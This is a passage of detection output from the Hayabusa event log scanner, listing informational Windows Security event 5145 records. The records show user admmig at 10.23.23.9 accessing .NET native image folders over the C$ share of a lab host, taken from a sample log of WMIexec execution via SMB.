10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 